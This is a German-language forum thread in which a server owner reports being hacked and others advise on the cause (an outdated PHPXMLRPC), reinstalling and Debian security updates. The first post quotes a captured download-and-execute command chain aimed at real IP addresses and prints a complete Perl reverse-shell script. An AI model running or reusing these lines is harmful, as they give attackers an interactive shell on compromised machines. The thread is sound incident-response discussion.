Server gehackt

[tofa]

Ohje, mein Server wurde offenbar schon wieder gehackt. Mir ist aufgefallen, dass die Systempartition voll lief. Ein Blick in ps- ax offenbarte mir folgendes:

8610 ? R 1652:46 sh -c wget http://81.58.26.26/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 210.245.233.251 8080;wget http://81.58.26.26/libsh/ping;chmod +x ping;./ping 210.245.233.251 8080;curl -o ping http://81.58.26.26/libsh/ping;chmod +x ping;./ping 210.245.233.251 8080;cd /tmp/;curl -o temp2006 http://81.58.26.26/libsh/ping.txt;while [ 1 ];do perl temp2006 210.245.233.251 8080;done;wget http://81.58.26.26/libsh/ping;chmod +x ping;./ping 210.245.233.251 8080;curl -o ping http://81.58.26.26/libsh/ping;chmod +x ping;./ping 210.245.233.2

Hinter ping.txt verbirgt sich dieses Script:

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");

Wie gehe ich am besten vor um herauszufinden, wie der Angreifer auf den Server eindringen konnte? Standardrootkits konnte ich über rkhunter keine finden.

Danke im Vorraus!

[rootsvr]

zu 90% schlecht programmierte PHP Skripte:
- nicht aktualisiertes phpbb
- ein blindes include("$POST_['site']") in ner Webseite o.ä.

aber guck halt deine Logfiles durch welche Seite davor aufgerufen wurde.

Ansonsten der Standardcheck: aktuelle Software? Alle patches? Sichere Passwörter?

[tofa]

Bei dem vom Script heruntergeladenen ping handelte es sich um Backdoor.Linux.Small.al, allerdings kann ich es nirgends auf dem Server finden.

Und noch ein großes Problem: Die Hauptpartition / ist 34 GB groß und angeblich voll, wenn ich aber mit du -cah / komme ich gerade mal auf 6 GB. Wie ist diese Differenz zu erklären? Ob wohl ein Rootkit installiert ist, er Dateien vor du verbirgt.

Leider habe ich nur per SSH Zugriff auf den Server und kann nicht einfach ein Notfallsystem mounten, um die Partition zu untersuchen. Welche Möglichkeiten habe ich die Speicherfresser zu finden und etwaige rootkits zu eliminieren, die wie clamscan, rkhunter und chkrootkit nicht gefunden werden konnten?

Viele Grüße
tofa

[tofa]

zu 90% schlecht programmierte PHP Skripte:

Es war wohl ein veraltete Version von PHPXMLRPC. :-/

Ansonsten der Standardcheck: aktuelle Software? Alle patches? Sichere Passwörter?

Bis auf PHPXMLRPC war alles aktuell.

Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.

[chris76]

Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.

Gar nicht, ich lege dir wirklich eine Komplette Neuinstallation ans Herz!

[Joe User]

Leider weiß ich nur nicht, wie ich die verursachten Schäden ohne komplette Neuinstallation in den Griff bekommen soll.

Da Du diese Frage nicht selbst beantworten kannst: Gar nicht!

Es bleibt Dir nur eine Neuinstallation mit anschliessenden und kontinuierlichen Updates aller installierten Software (inklusive aller Scripts). FAQ: http://www.rootforum.org/faq/14_183_de.html

[tofa]

Danke für die Antworten. Dann werde ich wohl wie befürchtet nicht um eine Neuinstallation umhinkommen.

[umbroboy]

Es bleibt Dir nur eine Neuinstallation mit anschliessenden und kontinuierlichen Updates aller installierten Software (inklusive aller Scripts). FAQ: http://www.rootforum.org/faq/14_183_de.html

Hallo mal,

wie mache ich das am besten, dass ich alle sicherheitsupdates auch mitbekomme und die dann automatisch installiert werden.

Vielleicht per Cronjob? oder gibts da ne coole idee, jetzt z.b. für ein debian system?

Vielen Dank

[Joe User]

Ein wöchentliches apt-get update && apt-get upgrade, sowie das tägliche Lesen der üblichen Security-Mailinglisten reicht normalerweise aus...

[eru der eine]

Auch ich kann dir debian-security@lists.debian.org nur ans Herz legen. Absolut low-traffic, wirklich nur die Meldungen.

Anmeldung gibts hier: http://lists.debian.org/debian-security-announce/.


Auf die Software, die du nicht aus den Debian-Quellen installiert hast, musst du wohl oder übel selbst aufpassen. Die meisten größeren Projekte im Server- bzw. Internet-Bereich bieten eigene Sicherheits-Mailinglisten oder die Möglichkeit, die sicherheitsrelevanten Bugs per Bugtracker zu abonnieren.

[lord_pinhead]

Vielleicht per Cronjob? oder gibts da ne coole idee, jetzt z.b. für ein debian system?

Ne coole idee hab ich, mach es per Hand. Updates macht man nicht per Cronjob, wenn was schiefläuft suchst du ewig bis du den Fehler findest.

[ffl]

cron-apt ist da allerdings ziemlich sinnvoll, um per Mail auf neue Pakete informiert zu werden, die man dann per Hand installiert.

[lord_pinhead]

Man wird es doch schaffen einmal am Tag sich kurz einzuloggen und einmal apt-get update && apt-get upgrade einzutippen? Und ausserdem kann man sich Security Bulletins holen um neuste Updates zu sehen (Beispiel: http://secunia.com/)